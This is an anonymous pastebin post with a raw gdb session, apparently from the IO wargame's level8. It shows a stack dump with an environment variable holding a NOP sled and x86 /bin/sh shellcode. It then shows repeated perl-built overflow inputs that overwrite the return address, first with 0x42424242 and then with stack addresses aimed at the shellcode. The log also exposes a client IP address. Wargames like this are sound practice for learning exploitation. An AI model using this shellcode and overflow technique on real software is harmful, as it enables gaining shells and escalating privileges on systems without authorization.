Posted by Anonymous on Sat 18 Jul 01:55
- 0xbfffddeb: "i686"
- 0xbfffddf0: ""
- 0xbfffddf1: ""
- 0xbfffddf2: ""
- 0xbfffddf3: ""
- 0xbfffddf4: ""
- 0xbfffddf5: ""
- 0xbfffddf6: ""
- 0xbfffddf7: "/levels/level8"
- 0xbfffde06: 'A' <repeats 32 times>
- 0xbfffde27: 'A' <repeats 13 times>, "BBBB"
- 0xbfffde39: "SHELLCODE=", '\220' <repeats 100 times>, "1�\215C\027�\2001�Rhn/shh//bi\211�RS\211�\v�\200"
- 0xbfffdec6: "SHELL=/bin/bash"
- 0xbfffded6: "TERM=xterm"
- 0xbfffdee1: "SSH_CLIENT=70.52.16.12 39289 22"
- 0xbfffdf01: "SSH_TTY=/dev/pts/1"
- 0xbfffdf14: "USER=level8"
- 0xbfffdf20: "COLUMNS=178"
- 0xbfffdf2c: "PATH=/usr/local/bin:/usr/bin:/bin:/usr/games"
- 0xbfffdf59: "MAIL=/var/mail/level8"
- 0xbfffdf6f: "_=/usr/bin/gdb"
- 0xbfffdf7e: "PWD=/levels"
- 0xbfffdf8a: "LINES=64"
- 0xbfffdf93: "HOME=/home/level8"
- 0xbfffdfa5: "SHLVL=1"
- 0xbfffdfad: "LOGNAME=level8"
- 0xbfffdfbc: "SSH_CONNECTION=70.52.16.12 39289 192.168.1.32 22"
- 0xbfffdfed: "/levels/level8"
- 0xbfffdffc: ""
- 0xbfffdffd: ""
- 0xbfffdffe: ""
- 0xbfffdfff: ""
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- 0xbfffe000: <Address 0xbfffe000 out of bounds>
- ---Type <return> to continue, or q <return> to quit---q
- Quit
- (gdb) quit
- The program is running. Exit anyway? (y or n) y
- level8@io:/levels$ gdb level8
- GNU gdb 6.8-debian
- Copyright (C) 2008 Free Software Foundation, Inc.
- License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
- This is free software: you are free to change and redistribute it.
- There is NO WARRANTY, to the extent permitted by law. Type "show copying"
- and "show warranty" for details.
- This GDB was configured as "i486-linux-gnu"...
- (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
- Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
- Program received signal SIGSEGV, Segmentation fault.
- 0x42424242 in ?? ()
- (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
- Program received signal SIGSEGV, Segmentation fault.
- 0xbfffded1 in ?? ()
- (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
- Program received signal SIGSEGV, Segmentation fault.
- 0xbfffded1 in ?? ()
- (gdb)
The pastebin: http://pastebin.com/m5e005077
Follow on Twitter!